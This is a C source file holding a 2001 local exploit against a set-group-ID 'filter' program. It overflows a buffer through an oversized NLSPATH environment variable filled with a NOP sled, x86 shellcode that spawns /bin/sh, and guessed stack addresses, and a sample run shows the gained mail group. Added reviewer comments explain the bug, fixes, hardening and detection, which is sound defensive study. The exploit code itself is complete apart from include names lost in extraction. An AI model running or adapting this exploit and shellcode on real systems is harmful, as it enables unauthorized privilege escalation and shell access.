/* filter-xpl.c
 * by core 2001
 *
 * $ ./filter-xpl
 * filter exploit by core 2001 based on code by Solar Designer/_Phantom_ 1997
 * bash$ id
 * uid=23269(core) gid=100(users) egid=12(mail)
 * bash$
 *
 * Reference:
 * http://www.tao.ca/fire/bos/0354.html
 *
 * looks like the code was ripped by phantom from Solar Designer
 * who published it in feb 1997.
 *
 * Date: Wed, 30 Apr 1997 13:46:39 +0200 (GMT+0200)
 * From: _Phantom_
 * To: Fyodor
 * Subject: Re: New sudo exploit
 *
 * Here 'tiz, the abominable SUDO exploit...
 * EDUCATIONAL purposes only.... :-)
 *
 * See ya.
 * Bye!
 */

/*
 * Review notes (defender's reading of this listing):
 *
 * - Bug class: an over-long, attacker-controlled environment variable
 *   (NLSPATH) is handed to a program that runs with extra privilege. The
 *   transcript above shows egid=12(mail) after the run, so the target was
 *   presumably installed set-group-ID mail -- confirm on the host in question.
 *   The vulnerable copy itself is not on this page; presumably NLSPATH is
 *   copied into a fixed-size stack buffer without a length check. Verify
 *   against the referenced advisory.
 * - Root-cause fix: privileged programs and the libraries they load must not
 *   trust the caller's environment, and every copy of environment data must
 *   be bounded. Current glibc drops NLSPATH in secure-execution mode
 *   (set-user-ID / set-group-ID programs).
 * - Hardening: the listing writes a stack address derived from its own %esp
 *   and places machine code in the environment string, so it depends on a
 *   predictable stack address and on stack memory being executable. A
 *   non-executable stack and ASLR remove both assumptions. Remove the set-ID
 *   bit from the target binary if the deployment does not need it.
 * - Detection: an environment value of roughly 1 KB made mostly of 0x90 bytes
 *   and other non-printable data, passed at exec time to a set-ID binary, does
 *   not look like any legitimate locale path.
 */

/* NOTE(review): the header names after each #include were lost when this page
 * was extracted; the five directives are kept exactly as they appear. */
#include
#include
#include
#include
#include

/* Absolute path of the privileged program that main() executes. */
#define PATH_FILTER "/usr/local/bin/filter"
/* Combined length in bytes of the 0x90 padding plus the payload in main(). */
#define BUFFER_SIZE 1024
/* Constant added to the sampled stack pointer before it is written out. */
#define DEFAULT_OFFSET 50

/*
 * Samples the current stack pointer with x86 inline assembly (AT&T syntax).
 * The function has no return statement: the caller receives whatever the asm
 * statement left in %eax, which is compiler- and architecture-dependent.
 */
u_long get_esp() { __asm__("movl %esp, %eax"); }

/*
 * Builds one long string, exports it as NLSPATH, and replaces the current
 * process with PATH_FILTER.
 *
 * String layout, in order:
 *   1. BUFFER_SIZE - strlen(execshell) bytes of 0x90
 *   2. the bytes of execshell
 *   3. 8/4 == 2 unsigned long values, each get_esp() + ofs
 *   4. a terminating NUL byte
 *
 * argc and argv are not used. No value is returned explicitly; on success
 * execl() does not return, and its failure is not checked.
 */
main(int argc, char **argv) {
    /* Opaque x86 machine code followed by the literal path "/bin/sh".
     * NOTE(review): not disassembled here; treat the bytes as a payload. */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    /* 4096 bytes is larger than the BUFFER_SIZE + 2 * sizeof(unsigned long) + 1
     * bytes written below, so the writes stay inside the allocation. */
    buff = malloc(4096);
    if(!buff) {
        printf("can't allocate memory\n");
        /* Exits with status 0 even though the allocation failed. */
        exit(0);
    }
    ptr = buff;

    /* Pad the front of the buffer with 0x90 (the x86 NOP opcode). */
    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
    ptr += BUFFER_SIZE-strlen(execshell);

    /* Copy the payload bytes directly after the padding. */
    for(i=0;i < strlen(execshell);i++)
        *(ptr++) = execshell[i];

    /* Append two copies of the same value, the sampled stack pointer plus
     * ofs, stored as unsigned long through a cast of the byte pointer. */
    addr_ptr = (long *)ptr;
    for(i=0;i < (8/4);i++)
        *(addr_ptr++) = get_esp() + ofs;

    /* NUL-terminate so the buffer can be passed to setenv() as a C string. */
    ptr = (char *)addr_ptr;
    *ptr = 0;

    printf("filter exploit by core 2001 based on code by Solar Designer/_Phantom_ 1997\n");

    /* Export the crafted string as NLSPATH, overwriting any existing value
     * (third argument is 1). */
    setenv("NLSPATH",buff,1);

    /* Run PATH_FILTER with argv[0] = "filter" and one argument "bash"; the
     * new process inherits the environment set above. */
    execl(PATH_FILTER, "filter","bash", NULL);
}